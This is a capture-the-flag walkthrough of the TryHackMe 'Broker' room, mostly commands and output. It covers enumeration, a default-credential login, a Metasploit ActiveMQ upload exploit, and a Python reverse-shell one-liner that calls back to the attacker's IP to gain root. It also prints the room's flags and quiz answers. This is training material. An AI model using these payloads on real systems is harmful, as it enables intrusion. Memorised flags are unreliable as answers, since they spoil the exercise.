----------------------------Broker room tryhackme ----------------------------
Ip: 10.10.78.239
level : Medium 
Link: https://tryhackme.com/room/broker


-----------------------------Enumeration
1883/tcp  open  mqtt?
8161/tcp  open  http       Jetty 7.6.9.v20130131
| vulners: 
|   cpe:/a:mortbay:jetty:7.6.9.v20130131: 
|     	SSV:26121	7.8	https://vulners.com/seebug/SSV:26121	*EXPLOIT*
|_    	CVE-2011-4461	5.3	https://vulners.com/cve/CVE-2011-4461



------directory enumeration
cat 10.10.255.87/recon/ffuf_10.10.255.87_8161.txt 
                        [Status: 200, Size: 5968, Words: 2626, Lines: 134, Duration: 178ms]
admin                   [Status: 401, Size: 1278, Words: 977, Lines: 33, Duration: 297ms]
api                     [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 178ms]
favicon.ico             [Status: 200, Size: 3638, Words: 16, Lines: 1, Duration: 181ms]
images                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 178ms]
index.html              [Status: 200, Size: 5968, Words: 2626, Lines: 134, Duration: 176ms]
index.html              [Status: 200, Size: 5968, Words: 2626, Lines: 134, Duration: 180ms]
styles                  [Status: 302, Size: 0, Words: 1, Lines: 1, Duration: 187ms]


------Nikto enum
cat 10.10.255.87/recon/nikto_10.10.255.87_8161.txt 
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP:          10.10.255.87
+ Target Hostname:    10.10.255.87
+ Target Port:        8161
+ Start Time:         2025-09-30 12:19:17 (GMT0)
---------------------------------------------------------------------------
+ Server: Jetty(7.6.9.v20130131)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ /qmjLaq1G.action: Default account found for 'ActiveMQRealm' at (ID 'admin', PW 'admin'). Generic account discovered.. See: CWE-16
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Jetty/7.6.9.v20130131 appears to be outdated (current is at least 11.0.6). Jetty 10.0.6 AND 9.4.41.v20210516 are also currently supported.
+ /admin/: Cookie JSESSIONID created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
+ /admin/: This might be interesting.
+ 8116 requests: 0 error(s) and 6 item(s) reported on remote host
+ End Time:           2025-09-30 12:48:55 (GMT0) (1778 seconds)


We see that we have default credentials 

We have 2 open ports interesting let us starrt when we access to the webite on the second port we have to put a username and password let us put them admin:admin


Good it works let us continue




searchsploit activemq                                                     
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                                                                                             |  Path
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
ActiveMQ < 5.14.0 - Web Shell Upload (Metasploit)                                                                                          | java/remote/42283.rb
Apache ActiveMQ 5.11.1/5.13.2 - Directory Traversal / Command Execution                                                                    | windows/remote/40857.txt
Apache ActiveMQ 5.2/5.3 - Source Code Information Disclosure                                                                               | multiple/remote/33868.txt
Apache ActiveMQ 5.3 - 'admin/queueBrowse' Cross-Site Scripting                                                                             | multiple/remote/33905.txt
Apache ActiveMQ 5.x-5.11.1 - Directory Traversal Shell Upload (Metasploit)                                                                 | windows/remote/48181.rb
Apache ActiveMQ 6.1.6 - Denial of Service (DOS)                                                                                            | multiple/remote/52288.py
------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
                                                                                                                                                                             
┌──(thierry㉿thierry)-[~/Desktop/rooms/Tryhackme/broker]
└─$ msfconsole -q                                               
msf > search activemq
use 0
set rhosts 10.10.78.239
set lhost tun0
msf exploit(multi/http/apache_activemq_upload_jsp) > run
[*] Started reverse TCP handler on 10.11.127.125:4444 
[*] Uploading http://10.10.78.239:8161//opt/apache-activemq-5.9.0/webapps/api//YfSqnESDSlt.jar
[*] Uploading http://10.10.78.239:8161//opt/apache-activemq-5.9.0/webapps/api//YfSqnESDSlt.jsp
[*] Sending stage (58073 bytes) to 10.10.78.239
[+] Deleted /opt/apache-activemq-5.9.0/webapps/api//YfSqnESDSlt.jar
[+] Deleted /opt/apache-activemq-5.9.0/webapps/api//YfSqnESDSlt.jsp
[*] Meterpreter session 1 opened (10.11.127.125:4444 -> 10.10.78.239:41762) at 2025-10-01 09:36:07 +0000

meterpreter >

Now we have access let us search for flag and privilege escalation methods
ls 
LICENSE
NOTICE
README.txt
activemq-all-5.9.0.jar
bin
chat.py
conf
data
flag.txt
lib
start.sh
subscribe.py
tmp
webapps
cat flag.txt
THM{you_got_a_m3ss4ge}



--------------------Let us search for interesting files

cat chat.py
import paho.mqtt.client as mqtt
import time

def on_connect(client, userdata, flags, rc):
	
	if rc == 0:
		print("Successfully connected to broker {0}, publishing to topic '{1}' now".format(hostname,topic))
		
	else:
		print("Could not connect to broker {0}".format(hostname))

def on_disconnect(client, userdata, rc):

	if rc != 0:
		print("Unexpected disconnection from host {}".format(hostname))
	print("Disconnected from host{}".format(hostname))


topic = "secret_chat"
hostname = "localhost"
port = 1883

client = mqtt.Client(client_id="wergieweuffe123530t", protocol=mqtt.MQTTv31, clean_session=True)
client.on_connect = on_connect
client.on_disconnect = on_disconnect
client.connect(hostname, port, 60)
client.loop_start()
while True:
	client.publish(topic, payload="Paul: Hey, have you played the videogame 'Hacknet' yet?",qos=2, retain=False)
	time.sleep(10)
	client.publish(topic, payload="Max: Yeah, honestly that's the one game that got me into hacking, since I wanted to know how hacking is 'for real', you know? ;)",qos=2, retain=False)
	time.sleep(10)
	client.publish(topic, payload="Paul: Sounds awesome, I will totally try it out then ^^",qos=2, retain=False)
	time.sleep(10)
	client.publish(topic, payload="Max: Nice! Gotta go now, the boss will kill us if he sees us chatting here at work. This broker is not meant to be used like that lol. See ya!",qos=2, retain=False

--videogram --> Hacknet

sudo -l
Matching Defaults entries for activemq on activemq:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User activemq may run the following commands on activemq:
    (root) NOPASSWD: /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py
    
    
    Let us check out tights on this file 
    
    
ls -la /opt/apache-activemq-5.9.0/subscribe.py
-rw-rw-r-- 1 activemq activemq 768 Dec 25  2020 /opt/apache-activemq-5.9.0/subscribe.py

Let us modify it to have the root flag

###Go on the folder

cd /opt/apache-activemq-5.9.0/   

##Put our reverse shell in the file

echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.127.125",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")' > subscribe.py


##Check if the file is good written
cat subscribe.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.11.127.125",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")

##Execute our reverse shell
sudo /usr/bin/python3.7 /opt/apache-activemq-5.9.0/subscribe.py


Now on our host we get the rev shell

rlwrap nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.11.127.125] from (UNKNOWN) [10.10.78.239] 53680
root@activemq:/opt/apache-activemq-5.9.0# cd /root
cd /root
root@activemq:~# ls
ls
root.txt
root@activemq:~# cat root.txt
cat root.txt
THM{br34k_br0k3_br0k3r}
root@activemq:~# 




====================================ANSWER TO QUESTIONS================================
Q1: 1883,8161
Q2: ActiveMQ
Q3: Hacknet
Q4: THM{you_got_a_m3ss4ge}
Q5: THM{br34k_br0k3_br0k3r}
